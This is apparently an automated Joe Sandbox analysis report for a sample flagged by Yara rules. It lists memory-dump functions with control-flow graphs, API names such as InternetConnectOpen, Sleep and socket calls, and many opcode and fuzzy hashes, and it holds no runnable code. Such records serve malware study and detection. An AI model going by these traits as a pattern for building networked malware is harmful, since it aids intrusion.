                                                                  • API String ID: 1789932928-0
                                                                  • Opcode ID: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
                                                                  • Instruction ID: 77740aa019b340e6add9100d2e632c86b6c08a603e2feec14d8c37a455a3d74e
                                                                  • Opcode Fuzzy Hash: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
                                                                  • Instruction Fuzzy Hash: 8151643071CA090FEB99AB7CA4567FA73D2E79D710F10492EE08AC7297DA74D842C781

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 152 1dde60ffc3e-1dde60ffc5d 153 1dde60ffc5f-1dde60ffc6d 152->153 154 1dde60ffc6f-1dde60ffc72 153->154 155 1dde60ffc74-1dde60ffc77 153->155 154->155 156 1dde60ffca7-1dde60ffcb1 154->156 155->153 157 1dde60ffc79-1dde60ffc7a 155->157 159 1dde60ffcb3-1dde60ffcb4 156->159 160 1dde60ffd0c-1dde60ffd1a SleepEx 156->160 158 1dde60ffc7c-1dde60ffca3 157->158 158->158 161 1dde60ffca5 158->161 162 1dde60ffcb6-1dde60ffcbd 159->162 163 1dde60ffd75-1dde60ffd76 160->163 164 1dde60ffd1c-1dde60ffd1d 160->164 161->153 166 1dde60ffcbf 162->166 167 1dde60ffcf5-1dde60ffd0a 162->167 165 1dde60ffd79-1dde60ffd87 163->165 168 1dde60ffd1f-1dde60ffd26 164->168 169 1dde60ffd8e-1dde60ffd91 165->169 170 1dde60ffd89-1dde60ffd8c 165->170 171 1dde60ffcc1-1dde60ffcf3 166->171 167->160 167->162 172 1dde60ffd5e-1dde60ffd73 168->172 173 1dde60ffd28 168->173 169->165 175 1dde60ffd93-1dde60ffd94 169->175 170->169 174 1dde60ffdc1-1dde60ffdd5 170->174 171->167 171->171 172->163 172->168 176 1dde60ffd2a-1dde60ffd5c 173->176 177 1dde60ffd96-1dde60ffdbd 175->177 176->172 176->176 177->177 178 1dde60ffdbf 177->178 178->165
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
                                                                  • Instruction ID: b1910887a85906b59e8af26a8396a496afa58602f1ce4e0f01a70eb8146ecaa2
                                                                  • Opcode Fuzzy Hash: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
                                                                  • Instruction Fuzzy Hash: 60512934244A598FC71CCE2CA5C1A3177D6F796305B15AABED99BCF26BC930D842C780

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: IoctlSocketclosesocket
                                                                  • String ID: _Cy
                                                                  • API String ID: 3445158922-1085951347
                                                                  • Opcode ID: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
                                                                  • Instruction ID: f9c2687faad64857410c6f9ffdb2fe1911e0fa3784b3522078136e68d28bacad
                                                                  • Opcode Fuzzy Hash: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
                                                                  • Instruction Fuzzy Hash: 9E316431658A584BDB54DF3898847AAB7E1FBE9315F110A3EE88EC71D1DB34C541C741

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$CloseHandleInternet_errno_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1304440831-0
                                                                  • Opcode ID: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
                                                                  • Instruction ID: 04ae9e50db02ab81041291e036b7cf9f312ddbf038429fa5f5e20d6328413cb4
                                                                  • Opcode Fuzzy Hash: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
                                                                  • Instruction Fuzzy Hash: E271D531658B184FEB95EB28E8867EAB7D5FB95311F004A2EE44BC7192EE34D901C781

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$ConnectOpen
                                                                  • String ID:
                                                                  • API String ID: 2790792615-0
                                                                  • Opcode ID: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
                                                                  • Instruction ID: e38b14064de517a1932d3f69b2b3ea0176a9e252f9b2ab42b8f88ba60b19c6a4
                                                                  • Opcode Fuzzy Hash: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
                                                                  • Instruction Fuzzy Hash: 7B5182302187144FEB89EF68E8957F977E6FB88300F15596EE04BC7292DA78D906C781

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 179 1dde6105fa4-1dde6105fc0 180 1dde6105fc2-1dde6105fc5 179->180 181 1dde610602a call 1dde6107db8 179->181 182 1dde610602f-1dde6106040 180->182 183 1dde6105fc7-1dde6105fd2 call 1dde6107d88 180->183 181->182 187 1dde6106020-1dde6106023 call 1dde60fba74 183->187 188 1dde6105fd4-1dde6105fd7 183->188 191 1dde6106028 187->191 188->187 189 1dde6105fd9-1dde6105fee 188->189 189->187 193 1dde6105ff0-1dde6105ff8 189->193 191->182 194 1dde610600d-1dde6106015 193->194 195 1dde6105ffa-1dde610600b VirtualFree 193->195 194->187 196 1dde6106017-1dde6106018 194->196 195->187 196->187
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
                                                                  • Instruction ID: 6470689af08f5538704a2cfa2ddb6c143224e3a787eee8a8f99c75ce7e277bc5
                                                                  • Opcode Fuzzy Hash: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
                                                                  • Instruction Fuzzy Hash: 8E11563064CB0A8BEFE5AB18B8847E97BE1EF94390F50492EE44AC6285DA34C845D781

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 337 7ff63f4f14d0-7ff63f4f14e1 call 7ff63f4f1180
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567608032.00007FF63F4F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63F4F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.3567542559.00007FF63F4F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568192647.00007FF63F791000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568220974.00007FF63F792000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568244093.00007FF63F795000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568272353.00007FF63F796000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568404896.00007FF63F8DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568427426.00007FF63F8DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3568452192.00007FF63F8E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff63f4f0000_SO2mdwWVvg.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aed762f0d2334a47ece5161a1267dca78ac943e00402746a499079c5fb7e6798
                                                                  • Instruction ID: 9ba1e0e49ce13c18d73a923a27c6faeaae357bcbbcac18dde0f1b56ce48b04c4
                                                                  • Opcode Fuzzy Hash: aed762f0d2334a47ece5161a1267dca78ac943e00402746a499079c5fb7e6798
                                                                  • Instruction Fuzzy Hash: 30B01221E0830580E38C3F01D94131823B06B48741F414430C40C43393CF3C50006710
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 2950348734-1077428164
                                                                  • Opcode ID: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
                                                                  • Instruction ID: 290bbb2ee6d37d130fc552558b24fc398541b94497bcd42241c56441c93a70a6
                                                                  • Opcode Fuzzy Hash: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
                                                                  • Instruction Fuzzy Hash: CB621830D18B598AFFAA9A58E4513F9B7E1FB96310F24592FD487CB1D2DA34D802C742
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 2950348734-3916222277
                                                                  • Opcode ID: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
                                                                  • Instruction ID: 29233bb238aa7d17bae2e738b1b902c87dd03fb75145e99ec07d9fba93df2fee
                                                                  • Opcode Fuzzy Hash: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
                                                                  • Instruction Fuzzy Hash: 5762E830D18B498AFFEA9A58E4553E9B7D1FB95300F244A1FD487CB1D2DA35D802CA82
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3442832105-0
                                                                  • Opcode ID: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
                                                                  • Instruction ID: 858f3f295eda60fe4522677f78fd67286af8a1644525aed7277bb814494d3cd9
                                                                  • Opcode Fuzzy Hash: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
                                                                  • Instruction Fuzzy Hash: 9652C73051CD859BFB9AAB2CE4417E5F3E0FFA8305F445A1AD985CB562EB34D982C780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _initp_misc_winsig
                                                                  • String ID:
                                                                  • API String ID: 2710132595-0
                                                                  • Opcode ID: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
                                                                  • Instruction ID: 711fd1a31317f6726959cf5de482ace0b694d05bf9323ed859e4b4a233f6b18c
                                                                  • Opcode Fuzzy Hash: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
                                                                  • Instruction Fuzzy Hash: 14A1F631619A099FFF85FFB5E888AAA37A2F768301711893B900AC7174DEBCD544CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
                                                                  • Instruction ID: e67bc4d2887fde223ad99ecde938219bce74279b807958381dd15655800b9f75
                                                                  • Opcode Fuzzy Hash: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
                                                                  • Instruction Fuzzy Hash: 7F81E330254A498FDB5CDE2CE4C4B6177E2FB56309F2496AED55ACF2A6DA30D843CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
                                                                  • Instruction ID: 3f463587ac40304c0ee63598e6d1e18124d5ab03b5f4156fa461e42f5e8507a7
                                                                  • Opcode Fuzzy Hash: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
                                                                  • Instruction Fuzzy Hash: 09620B312286558FD31CCB1CC5B1B7AB7E1FB8A340F44896DE287CB692C639D945CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
                                                                  • Instruction ID: e077f2bc8d497bd772232e4b621271e3aadde02e57b1bd505b209e0e24c769e0
                                                                  • Opcode Fuzzy Hash: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
                                                                  • Instruction Fuzzy Hash: 0652ED312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639D545CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  • Opcode ID: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
                                                                  • Instruction ID: c6cb87fddc3a668cbd58908b56f37b751b253737de46bc9ea2e9e12397ad9fb5
                                                                  • Opcode Fuzzy Hash: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
                                                                  • Instruction Fuzzy Hash: E431C6302087084EE7566F78E8973E97795EB47320F250A5AE862CF2E3DA719C01C691

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2644381645-0
                                                                  • Opcode ID: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
                                                                  • Instruction ID: 2b5eb6863b414cd6265b8830057a2fb5e3176fdcc6627e662125e36664ea9965
                                                                  • Opcode Fuzzy Hash: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
                                                                  • Instruction Fuzzy Hash: B6213B31608A080EF75A7B6CF8623F973D1EB45321F150A5FE416CF1E7CAA45C41C6A2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1078912150-0
                                                                  • Opcode ID: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
                                                                  • Instruction ID: 8be2fa9e2e3db0ac479ca0288f16056c3cd63fd0fe889e9643493ad52d3af01f
                                                                  • Opcode Fuzzy Hash: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
                                                                  • Instruction Fuzzy Hash: 2E2129316096080EF75B6BA9F8973FD77D0EB85320F150A1AE416CF1D7C7A05C01C696
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2464146582-0
                                                                  • Opcode ID: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
                                                                  • Instruction ID: 996887796e37665f974ade1b244b3b3acdedda605c6099f3bc9111c332409572
                                                                  • Opcode Fuzzy Hash: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
                                                                  • Instruction Fuzzy Hash: BD21F730E0C6044FF75A6B68F8923E977C0DB85322F150A1EE416CF1E7DEA45C01C696
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2140805544-0
                                                                  • Opcode ID: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
                                                                  • Instruction ID: df2125d0a787ca236c17ff25845623e50d8e0e009eb6a43ca8d6c117f9e4202c
                                                                  • Opcode Fuzzy Hash: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
                                                                  • Instruction Fuzzy Hash: AE21E731908A084EF7566F74E8913E97791EF46362F260D2EE41ACF1E3CEB59840C755
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$FreeHeap_errno
                                                                  • String ID:
                                                                  • API String ID: 2737118440-0
                                                                  • Opcode ID: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
                                                                  • Instruction ID: a0c46b563e80cbaf98f7def848b93db60d9183bfb0ef007630133e71fa2dbcfb
                                                                  • Opcode Fuzzy Hash: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
                                                                  • Instruction Fuzzy Hash: E14123352559098FFFE6EF58F8A5BE533D1FB58315F98482E940ACA1D2CE2C9846CB10
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh
                                                                  • String ID:
                                                                  • API String ID: 4160633307-0
                                                                  • Opcode ID: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
                                                                  • Instruction ID: c6bb776396f4dfccf3baa5df519ce66b8ff78da7e9243b56a727c2f386d94b65
                                                                  • Opcode Fuzzy Hash: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
                                                                  • Instruction Fuzzy Hash: 1791D430318B184FEB69AB2CA4517FA73D1EB95710F540A1FD48ACB282DE64DC07C6C2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3191669884-0
                                                                  • Opcode ID: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
                                                                  • Instruction ID: a5e56dc5835a69cd40e95eb3a0ee32e907e78023be0f16ae3a118c406ddd31c0
                                                                  • Opcode Fuzzy Hash: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
                                                                  • Instruction Fuzzy Hash: 7B316330618B084FDB96EF58E0857AA7BE1FB58320F510AAEE459CB2D6DA70DC41C781
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 2917016420-0
                                                                  • Opcode ID: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
                                                                  • Instruction ID: c0d72a0000956dac41ad2a0d8af83851449b5793db51773198f811a5947c6a8d
                                                                  • Opcode Fuzzy Hash: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
                                                                  • Instruction Fuzzy Hash: DC31C430614A094FFF99AF78A8193E977D1FB88315F14495EA44AC72D2DB78C841C742
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 4120058822-0
                                                                  • Opcode ID: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
                                                                  • Instruction ID: 5fd6336bb513de4dc89b08a12d7cd3d11e3e9f9b0f58beeba8c28e1a72fd48c7
                                                                  • Opcode Fuzzy Hash: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
                                                                  • Instruction Fuzzy Hash: 3421D430608A094EF767AFA8F8E13ED7790EB45720F05495EE426CF2E7D6645800C799
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2328795619-0
                                                                  • Opcode ID: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
                                                                  • Instruction ID: fb2c4129894095aa0ad6e8edf650404727902e3b2f875dcfe3047ff54259e0bd
                                                                  • Opcode Fuzzy Hash: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
                                                                  • Instruction Fuzzy Hash: B961D930218F094AFBAD562C78663B973D1E795720F140B2FE466C72D5DE61EC52C6C2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  • Opcode ID: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
                                                                  • Instruction ID: 73211a85cd4913376496403dc2399893ab03024b613830270e863e30b80bb9e3
                                                                  • Opcode Fuzzy Hash: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
                                                                  • Instruction Fuzzy Hash: 6C21A130618A4D8FFBD6AB38A4153AA77D1EB99310F144D6BA445CB2E2DE64CC41C792
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
                                                                  • Instruction ID: b60ad625351e9d2a2606122ef780abbc836f8778741b6e129cef78d4a3082311
                                                                  • Opcode Fuzzy Hash: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
                                                                  • Instruction Fuzzy Hash: 9851A530718F195FEB9EAB28A4517BA77D0FB5A314F50092ED88AC7286EE10DC42C6C5
                                                                  APIs
